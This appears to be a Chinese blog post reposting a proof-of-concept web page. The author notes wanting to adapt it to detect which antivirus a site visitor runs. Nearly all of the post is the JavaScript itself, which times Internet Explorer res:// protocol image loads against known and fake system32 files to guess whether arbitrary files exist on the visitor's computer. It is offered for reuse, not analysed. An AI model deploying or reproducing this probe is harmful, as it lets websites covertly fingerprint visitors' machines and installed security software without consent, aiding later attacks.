学步园

一个很有趣的应用。试想当用户浏览网页时，我们就可以利用js判断他安装了什么杀毒软件，有点意思，呵呵。从网上看到了一个PoC，过几天自己修改修改，整合利用一下。

客户端js脚本利用res协议对系统存在的文件和不存在的文件加载时间的差异来估算文件是否存在。

--------------------------------------------------------------------------------------------------------------------------------

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<BODY>

<SCRIPT>
var goodTime = 0;
var badTime = 0;
var good = ["c:\\windows\\system32\\telnet.exe",
     "c:\\windows\\system32\\msimsg.dll",
     "c:\\windows\\system32\\xcopy.exe",
     "c:\\windows\\system32\\wuauserv.dll"];

var bad = ["c:\\windows\\system32\\asdf.dll",
     "c:\\windows\\system32\\1234.dll",
     "c:\\windows\\system32\\asdf.exe",
     "c:\\windows\\system32\\1234.exe"];
calibrateGood(0);

function calibrateGood (index)
{
if (index < 4)
{
   goodTime += time(good[index], 1);
   setTimeout ("calibrateGood(" + (index + 1) + ")", 500);
   return;
}
goodTime = goodTime / 4;
setTimeout ("calibrateBad(0)", 0);
}
    

function calibrateBad (index)
{
if (index < 4)
{
   badTime += time(bad[index], 1);
   setTimeout ("calibrateBad(" + (index + 1) + ")", 500);
   return;
}
badTime = badTime / 4;
log("<br>Average good time is " + goodTime + "ms<br>Average bad time is " + badTime + "ms<br>");
setTimeout ("promptUser()", 0);
}
    

function promptUser()
{
while (1)
{
   var file = window.prompt("Enter file name to test.", '');
   if (file == '' || ! file )
   {return;}
  
   var result = time(file);
   if (Math.abs(badTime - result) < Math.abs(goodTime - result))
   {
    log(file + " doesn't appear to exist - " + result + "ms");
   }
   else
   {
    log(file + " appears to exist - " + result + "ms");
   }
}
}

function time(file, debug)
{
var url = "res://" + file + "/#2/#";
var test = new Image();
var d = new Date();
//alert();
for (var loop = 0; loop < 1000; loop++)
{
   test.src = url + (loop + 1000);
//alert('');
}
var d2 = new Date();
var time = d2.getTime() - d.getTime();
if (debug) {log(file + " - " + time);}
// alert(time);
return time;

}

function log(data)
{
var text;
text = document.createElement('div');
text.innerHTML = data + "<br>";
document.body.appendChild(text);
}

</SCRIPT>
</BODY></HTML>